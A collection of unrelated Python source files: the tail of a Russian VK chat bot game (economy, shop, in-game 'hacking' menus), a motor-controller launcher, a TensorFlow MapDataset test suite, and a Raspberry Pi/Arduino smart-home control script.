vk.method("messages.send", {"peer_id": id,
"message": giveban(id, idd, rsn),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Используйте:\n'gban {id} {причина}'",
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор!",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'unban':
if id in admins or id in moders:
if len(str(body).split()) == 2:
temp = str(body).split(" ")
idd = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": unban(idd),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Используйте:\n'unban {id}'",
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "Вы не Администратор!",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'staff' or body.lower() == 'админы' or body.lower() == 'модеры' or body.lower() == 'стафф':
vk.method("messages.send", {"peer_id": id,
"message": staff(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'фильм':
vk.method("messages.send", {"peer_id": id,
"message": rfilm(),
"attachment": d,
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'работа' or body.lower() == '⬅ работа':
vk.method("messages.send", {"peer_id": id,
"message": workinfo(id),
"keyboard": mainworkmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'уровни':
vk.method("messages.send", {"peer_id": id,
"message": levels(),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'передать' or str(body.lower()).split()[0] == 'перевод':
# if id in admins or id in moders:
# vk.method("messages.send", {"peer_id": id,
# "message": "Персоналу запрещено передавать деньги",
# "random_id": random.randint(1, 2147483647)})
# else:
if len(str(body).split()) == 3:
temp = str(body).split(" ")
idd = temp[1]
val = temp[2]
vk.method("messages.send", {"peer_id": id,
"message": pay(id, idd, val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Используйте:\nПередать {id} {сумма}\n\nЧтобы узнать ID - используйте 'ид {ссылка на профиль}'",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'банк' or body.lower() == 'Банк баланс':
temp = str(body.lower()).split(" ")
if len(temp) == 3:
type = temp[1]
amount = temp[2]
vk.method("messages.send", {"peer_id": id,
"message": bank(id, type, amount),
"keyboard": bankmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
else:
with open('json/' + str(id) + '.json', encoding='utf-8') as f:
ff = json.loads(f.read())
vk.method("messages.send", {"peer_id": id,
"message": "💳 Баланс счёта: " + str(ff["bank"]) + "$\n\n⚠ Используйте:\nБанк положить {сумма}\nили\nБанк снять {сумма}",
"keyboard": bankmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'бонус':
vk.method("messages.send", {"peer_id": id,
"message": gbonus(id),
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == "ид":
if len(str(body).split()) == 2:
temp = str(body).split(" ")
idd = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": idsearch(idd),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Чтобы узнать ID - используйте 'ид {ссылка на профиль}'",
"random_id": random.randint(1, 2147483647)})
# Магазин
elif body.lower() == 'магазин' or body.lower() == "⬅ магазин":
vk.method("messages.send", {"peer_id": id,
"message": shop(),
"keyboard": shopmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'продать':
vk.method("messages.send", {"peer_id": id,
"message": sell(),
"keyboard": sellmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'машины':
vk.method("messages.send", {"peer_id": id,
"message": cars(),
"keyboard": carsmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'телефоны':
vk.method("messages.send", {"peer_id": id,
"message": phones(),
"keyboard": phonemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'дома':
vk.method("messages.send", {"peer_id": id,
"message": homes(),
"keyboard": homemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'кмашину':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bcar(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: кмашину 1",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пмашину':
vk.method("messages.send", {"peer_id": id,
"message": sellcar(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'ктел':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bphone(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: ктел 1",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'птел':
vk.method("messages.send", {"peer_id": id,
"message": sellphone(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'кдом':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bhome(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: ктел 1",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пдом':
vk.method("messages.send", {"peer_id": id,
"message": sellhome(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
# Магазин
elif body.lower() == 'ихелп':
vk.method("messages.send", {"peer_id": id,
"message": prophelp(),
"random_id": random.randint(1, 2147483647)})
# Bytecoin
elif body.lower() == 'видеокарты':
vk.method("messages.send", {"peer_id": id,
"message": fshop(),
"keyboard": gpumenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'ккарту':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bfarm(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: ккарту 1",
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пкарту':
vk.method("messages.send", {"peer_id": id,
"message": sfarm(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "ферма":
vk.method("messages.send", {"peer_id": id,
"message": farmstatus(id),
"keyboard": farmmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "♻ обновить":
vk.method("messages.send", {"peer_id": id,
"message": farmstatus(id),
"keyboard": farmmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "сбитки":
vk.method("messages.send", {"peer_id": id,
"message": sellbtc(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == "бкурс":
vk.method("messages.send", {"peer_id": id,
"message": btcrateshow(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'пбитк':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": btctousd(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: пбитк 1.25",
"random_id": random.randint(1, 2147483647)})
elif str(body.lower()).split()[0] == 'кбитк':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": usdtobtc(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
else:
vk.method("messages.send", {"peer_id": id,
"message": "Неверное использование команды!\nПример: пбитк 1.25",
"random_id": random.randint(1, 2147483647)})
# Bytecoin
elif body.lower() == 'топ':
vk.method("messages.send", {"peer_id": id,
"message": "Какй топ вы хотите посмтореть?"
"\nБалтоп - топ по балансу"
"\nБитктоп - топ по кол-ву биткоинов",
"keyboard": topmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'битктоп':
try:
vk.method("messages.send", {"peer_id": id,
"message": topbtc,
"keyboard": topmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
except:
vk.method("messages.send", {"peer_id": id,
"message": "Топ еще не обновлён",
"keyboard": topmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'балтоп':
try:
vk.method("messages.send", {"peer_id": id,
"message": topbal,
"random_id": random.randint(1, 2147483647)})
log(id, body)
except:
vk.method("messages.send", {"peer_id": id,
"message": "Топ еще не обновлён",
"keyboard": topmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
# Хакерство
elif body.lower() == 'хакерство' or body.lower() == "⬅ хакерство" or body.lower() == "🏠 хакерство":
vk.method("messages.send", {"peer_id": id,
"message": hackmenu(id),
"keyboard": mainhackmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'darkshop' or body.lower() == "⬅ darkshop":
vk.method("messages.send", {"peer_id": id,
"message": darkshop(),
"keyboard": dsmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'компы' or body.lower() == 'компьютеры' or body.lower() == 'комп':
vk.method("messages.send", {"peer_id": id,
"message": comps(),
"keyboard": compmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'впн' or body.lower() == 'vpn':
vk.method("messages.send", {"peer_id": id,
"message": vpns(),
"keyboard": vpnmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'убежища' or body.lower() == 'убежище' or body.lower() == 'убеж':
vk.method("messages.send", {"peer_id": id,
"message": shltrs(),
"keyboard": shltrmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'ккомп':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bcomp(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'квпн':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bvpn(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'кубежище' or str(body.lower()).split()[0] == 'кубеж':
if len(str(body).split()) == 2:
temp = str(body).split(" ")
n = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": bshltr(id, n),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'прoдать':
vk.method("messages.send", {"peer_id": id,
"message": "Выберите что продать"
"\n"
"\n 💻 Пкомп" \
"\n 🛡 Пвпн" \
"\n 🚪 Пубежище",
"keyboard": selldarkmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
elif body.lower() == 'пкомп':
vk.method("messages.send", {"peer_id": id,
"message": scomps(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'пвпн':
vk.method("messages.send", {"peer_id": id,
"message": svpn(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'пубежище' or body.lower() == 'пубеж':
vk.method("messages.send", {"peer_id": id,
"message": sshltr(id),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'улучшения' or body.lower() == 'улучшение' or body.lower() == '⬅ улучшения':
vk.method("messages.send", {"peer_id": id,
"message": upl(),
"keyboard": uplmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'хп' or body.lower() == '💊 хп':
vk.method("messages.send", {"peer_id": id,
"message": hpup(id),
"keyboard": phpmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'защита' or body.lower() == '🕶 защита':
vk.method("messages.send", {"peer_id": id,
"message": defup(id),
"keyboard": pdefmenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'урон' or body.lower() == '🔫 урон':
vk.method("messages.send", {"peer_id": id,
"message": dmgup(id),
"keyboard": pdamagemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'пхп' or body.lower() == "прокачать хп":
temp = str(body.lower()).split(" ")
try:
if temp[1] == "хп":
val = ""
else:
val = temp[1]
except:
val = ""
vk.method("messages.send", {"peer_id": id,
"message": php(id,val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'пдеф' or body.lower() == "прокачать защиту":
temp = str(body.lower()).split(" ")
try:
if temp[1] == "защиту":
val = ""
else:
val = temp[1]
except:
val = ""
vk.method("messages.send", {"peer_id": id,
"message": pdef(id,val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif str(body.lower()).split()[0] == 'пурон' or body.lower() == "прокачать урон":
temp = str(body.lower()).split(" ")
try:
if temp[1] == "урон":
val = ""
else:
val = temp[1]
except:
val = ""
vk.method("messages.send", {"peer_id": id,
"message": pdmg(id,val),
"random_id": random.randint(1, 2147483647)})
log(id, body)
elif body.lower() == 'битва':
vk.method("messages.send", {"peer_id": id,
"message": "🔫 Выберите вид битвы",
"keyboard": battlemenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
log(id, body)
# Хакерство
else:
vk.method("messages.send", {"peer_id": id,
"message": "Увы, но такой команды нет\nПосмотреть их список можно написав 'команды'\n\nДля связи с администрацией, используйте 'репорт'",
"keyboard": errormenu().get_keyboard(),
"random_id": random.randint(1, 2147483647)})
else:
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
temp = ff["banned"].split()
idd = temp[0]
reason = temp[1]
vk.method("messages.send", {"peer_id": id,
"message": "⚠ Вы заблокированы vk.com/id" + idd + "\nПо причине: " + reason,
"random_id": random.randint(1, 2147483647)})
except:
vk.method("messages.send", {"peer_id": id,
"message": "⚠ Вы заблокированы",
"random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "К сожалению,я могу распознать только текст :(",
"keyboard": mainmenu(id).get_keyboard(),
"random_id": random.randint(1, 2147483647)})
except BaseException as E:
log("system | " + str(id) + " | ", E)
pass
|
app.py
|
from motor_controller import start_motor_controller
from web_server import start_webserver
from discovery_service import discovery
from multiprocessing import Process
if __name__ == '__main__':
mc = start_motor_controller()
p = Process(target=discovery)
p.start()
start_webserver(mc)
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_threads,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_threads = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(components, count, num_threads,
output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_threads_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_threads: num_threads_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_threads_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_threads_val, output_buffer_size_val)
def _testDisposeParallelMapDataset(self, explicit_dispose):
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
if explicit_dispose:
dispose_op = iterator.dispose_op()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
if explicit_dispose:
sess.run(dispose_op)
def testExplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(True)
def testImplicitDisposeParallelMapDataset(self):
self._testDisposeParallelMapDataset(False)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testParallelMapIgnoreError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for x in [1., 2., 3., 5.]:
self.assertEqual(x, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReadFileIgnoreError(self):
def write_string_to_file(value, filename):
with open(filename, "w") as f:
f.write(value)
filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
for i in range(5)]
for filename in filenames:
write_string_to_file(filename, filename)
dataset = (dataset_ops.Dataset.from_tensor_slices(filenames)
.map(io_ops.read_file, num_threads=2, output_buffer_size=2)
.ignore_errors())
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# All of the files are present.
sess.run(init_op)
for filename in filenames:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Delete one of the files.
os.remove(filenames[0])
# Attempting to read filenames[0] will fail, but ignore_errors()
# will catch the error.
sess.run(init_op)
for filename in filenames[1:]:
self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
print(sess.run(get_next))
print(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
with self.test_session() as sess:
with self.assertRaisesRegexp(errors.FailedPreconditionError,
"Failed to capture resource"):
sess.run(init_op)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
if __name__ == "__main__":
test.main()
|
main V2 BETA 2.0 .py
|
import serial # For Bluetooth
from nanpy import (ArduinoApi, SerialManager) # For Arduino
import RPi.GPIO as GPIO # For Raspberry Pi
from threading import Thread
from time import sleep, time
import os
from Adafruit_CharLCD import Adafruit_CharLCD
import socket
# Bluetooth Serial Conniction
ser = serial.Serial('/dev/ttyS0', 9600, timeout = 0)
# Arduino Nanpy Conniction
connection = SerialManager()
a = ArduinoApi(connection = connection)
# Python Variables
sysMode = 0
serialRead = 0
check_mode = 1
IP = 0
v_LCD = [None,None,None]
lights_STT = [0,0,0,0]
temp_STT = 0
motion_STT = 0
# GPIO Variables
SMOKE_IN = 19
TRIG = 2
ECHO = 3
# GPIO Pins
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(SMOKE_IN, GPIO.IN)
GPIO.setup(TRIG,GPIO.OUT)
GPIO.setup(ECHO,GPIO.IN)
# LCD GPIO Pins
lcd_af = Adafruit_CharLCD(rs=26, en=12, d4=13, d5=6, d6=5, d7=11, cols=16, lines=2) # GPIO.BCM
# Arduino Variables
office = 13
r_office = 4
kitchen = 12
r_kitchen = 2
meeting_room = 3
r_meeting_room = 5
waiting_room = 7
r_waiting_room = 14
employee_room = 9
bath_room = 8
buzzer = 22
fan = 52
# Arduino Pins
a.pinMode(office, a.OUTPUT)
a.pinMode(r_office, a.INPUT)
a.pinMode(kitchen, a.OUTPUT)
a.pinMode(r_kitchen, a.INPUT)
a.pinMode(meeting_room, a.OUTPUT)
a.pinMode(r_meeting_room, a.INPUT)
a.pinMode(waiting_room, a.OUTPUT)
a.pinMode(r_waiting_room, a.INPUT)
a.pinMode(employee_room, a.OUTPUT)
a.pinMode(bath_room, a.OUTPUT)
a.pinMode(buzzer, a.OUTPUT)
a.pinMode(fan, a.OUTPUT)
# IP Address Function
def ip_address():
return [
(s.connect(('8.8.8.8', 53)),
s.getsockname()[0],
s.close()) for s in
[socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]
][0][1]
# LCD Variable Function
def LCD(line1, line2, delay):
v_LCD [0] = line1
v_LCD [1] = line2
v_LCD [2] = delay
# Light Resistor Function
def r_room(ldr, room, name, num):
if a.digitalRead(ldr) == True:
a.digitalWrite(room, a.LOW)
if lights_STT [num] < 1:
LCD(name, 'is OFF', 2)
lights_STT [num] = lights_STT [num] + 1
elif a.digitalRead(ldr) == False:
a.digitalWrite(room, a.HIGH)
LCD(name, 'is ON', 2)
lights_STT [num] = 0
# Manual Control
def m_room(on, off, room, name):
if serialRead == on:
a.digitalWrite(room, a.HIGH)
LCD(name, 'is ON', 2)
elif serialRead == off:
a.digitalWrite(room, a.LOW)
LCD(name, 'is OFF', 2)
# Mobile Check
def m_check(room, on, off):
if a.digitalRead(room) == True:
ser.write(on)
elif a.digitalRead(room) == False:
ser.write(off)
# Lights Thread
def lights():
while True:
# Global Variables
global sysMode
global serialRead
global office
global r_office
global kitchen
global r_kitchen
global meeting_room
global r_meeting_room
